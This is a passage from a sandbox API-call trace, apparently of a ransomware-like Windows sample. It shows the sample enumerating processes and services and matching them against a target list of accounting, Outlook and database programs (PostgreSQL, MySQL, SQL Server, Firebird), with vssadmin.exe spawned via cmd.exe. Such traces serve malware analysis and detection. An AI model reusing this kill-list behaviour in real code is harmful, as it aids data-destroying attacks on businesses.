th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.965] lstrlenW (lpString="svchost.exe") returned 11 [0265.965] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.965] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.965] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.965] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0265.966] lstrlenW (lpString="userinit.exe") returned 12 [0265.966] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0265.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0265.966] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0265.966] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0265.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0265.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0265.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0265.966] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0265.966] lstrlenW (lpString="explorer.exe") returned 12 [0265.966] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0265.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0265.966] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0265.966] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0265.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0265.966] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0265.967] lstrlenW (lpString="dwm.exe") returned 7 [0265.967] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.967] lstrlenW (lpString="svchost.exe") returned 11 [0265.967] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0265.967] lstrlenW (lpString="agent1c.exe") returned 11 [0265.967] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0265.968] lstrlenW (lpString="spoolsv.exe") returned 11 [0265.968] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0265.968] lstrlenW (lpString="reader_sl.exe") returned 13 [0265.968] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0265.968] lstrlenW (lpString="dllhost.exe") returned 11 [0265.968] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0265.969] lstrlenW (lpString="taskhost.exe") returned 12 [0265.969] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.969] lstrlenW (lpString="svchost.exe") returned 11 [0265.969] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0265.969] lstrlenW (lpString="cmd.exe") returned 7 [0265.969] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0265.969] lstrlenW (lpString="conhost.exe") returned 11 [0265.969] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0265.970] lstrlenW (lpString="vssadmin.exe") returned 12 [0265.970] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x610, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0265.970] CloseHandle (hObject=0x304) returned 1 [0265.970] Sleep (dwMilliseconds=0x1f4) [0266.665] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4275d18 [0266.874] EnumServicesStatusExW (in: hSCManager=0x4275d18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0266.875] GetLastError () returned 0xea [0266.875] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa64) returned 0x3593f60 [0266.875] EnumServicesStatusExW (in: hSCManager=0x4275d18, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3593f60, cbBufSize=0xa64, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3593f60, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0266.875] CloseServiceHandle (hSCObject=0x4275d18) returned 1 [0266.875] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0266.875] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.875] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0266.875] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0266.875] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0266.875] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0266.875] lstrlenW (lpString="AudioSrv") returned 8 [0266.875] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0266.875] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0266.875] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0266.875] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0266.875] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0266.876] lstrlenW (lpString="BFE") returned 3 [0266.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0266.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0266.876] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0266.876] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0266.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0266.876] lstrlenW (lpString="CscService") returned 10 [0266.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0266.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0266.876] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0266.876] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0266.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0266.876] lstrlenW (lpString="DcomLaunch") returned 10 [0266.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.876] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0266.876] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0266.876] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0266.876] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0266.876] lstrlenW (lpString="Dhcp") returned 4 [0266.876] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0266.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0266.877] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0266.877] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0266.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0266.877] lstrlenW (lpString="Dnscache") returned 8 [0266.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0266.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0266.877] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0266.877] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0266.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0266.877] lstrlenW (lpString="eventlog") returned 8 [0266.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0266.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0266.877] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0266.877] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0266.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0266.877] lstrlenW (lpString="EventSystem") returned 11 [0266.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0266.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0266.877] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0266.877] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0266.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0266.877] lstrlenW (lpString="gpsvc") returned 5 [0266.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0266.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0266.877] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0266.877] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0266.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0266.877] lstrlenW (lpString="lmhosts") returned 7 [0266.877] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0266.877] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0266.877] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0266.877] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0266.877] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0266.877] lstrlenW (lpString="MMCSS") returned 5 [0266.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0266.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0266.878] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0266.878] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0266.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0266.878] lstrlenW (lpString="MpsSvc") returned 6 [0266.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0266.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0266.878] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0266.878] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0266.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0266.878] lstrlenW (lpString="nsi") returned 3 [0266.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0266.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0266.878] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0266.878] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0266.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0266.878] lstrlenW (lpString="PlugPlay") returned 8 [0266.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0266.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0266.878] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0266.878] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0266.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0266.878] lstrlenW (lpString="Power") returned 5 [0266.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0266.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0266.878] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0266.878] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0266.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0266.878] lstrlenW (lpString="ProfSvc") returned 7 [0266.878] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0266.878] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0266.878] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0266.878] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0266.878] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0266.879] lstrlenW (lpString="RpcEptMapper") returned 12 [0266.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0266.879] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0266.879] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0266.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0266.879] lstrlenW (lpString="RpcSs") returned 5 [0266.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0266.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0266.879] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0266.879] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0266.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0266.879] lstrlenW (lpString="SamSs") returned 5 [0266.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0266.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0266.879] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0266.879] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0266.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0266.879] lstrlenW (lpString="Schedule") returned 8 [0266.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0266.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0266.879] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0266.879] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0266.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0266.879] lstrlenW (lpString="SENS") returned 4 [0266.879] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0266.879] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0266.879] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0266.879] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0266.879] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0266.879] lstrlenW (lpString="ShellHWDetection") returned 16 [0266.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0266.880] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0266.880] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0266.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0266.880] lstrlenW (lpString="Spooler") returned 7 [0266.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0266.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0266.880] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0266.880] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0266.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0266.880] lstrlenW (lpString="Themes") returned 6 [0266.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0266.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0266.880] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0266.880] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0266.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0266.880] lstrlenW (lpString="UxSms") returned 5 [0266.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0266.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0266.880] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0266.880] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0266.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0266.880] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x3593f60 | out: hHeap=0x4a0000) returned 1 [0266.880] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x310 [0266.882] Process32FirstW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.882] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0266.883] lstrlenW (lpString="System") returned 6 [0266.883] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0266.883] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0266.883] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0266.883] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0266.883] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0266.883] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0266.883] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0266.883] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0266.883] lstrlenW (lpString="smss.exe") returned 8 [0266.883] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0266.883] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0266.883] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0266.883] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0266.883] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0266.883] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0266.884] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0266.884] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.884] lstrlenW (lpString="csrss.exe") returned 9 [0266.884] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.884] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.884] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.884] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.884] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.884] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.884] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.884] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.884] lstrlenW (lpString="wininit.exe") returned 11 [0266.884] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0266.884] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0266.884] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0266.884] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0266.885] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0266.885] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0266.885] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0266.885] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.885] lstrlenW (lpString="csrss.exe") returned 9 [0266.885] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.885] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.885] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.885] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.885] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.885] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.885] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.885] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.885] lstrlenW (lpString="winlogon.exe") returned 12 [0266.885] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0266.885] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0266.885] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0266.886] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0266.886] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0266.886] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0266.886] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0266.886] Process32NextW (in: hSnapshot=0x310, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.886] lstrlenW (lpString="services.exe") returned 12 [0266.886] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0266.886] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0266.886] 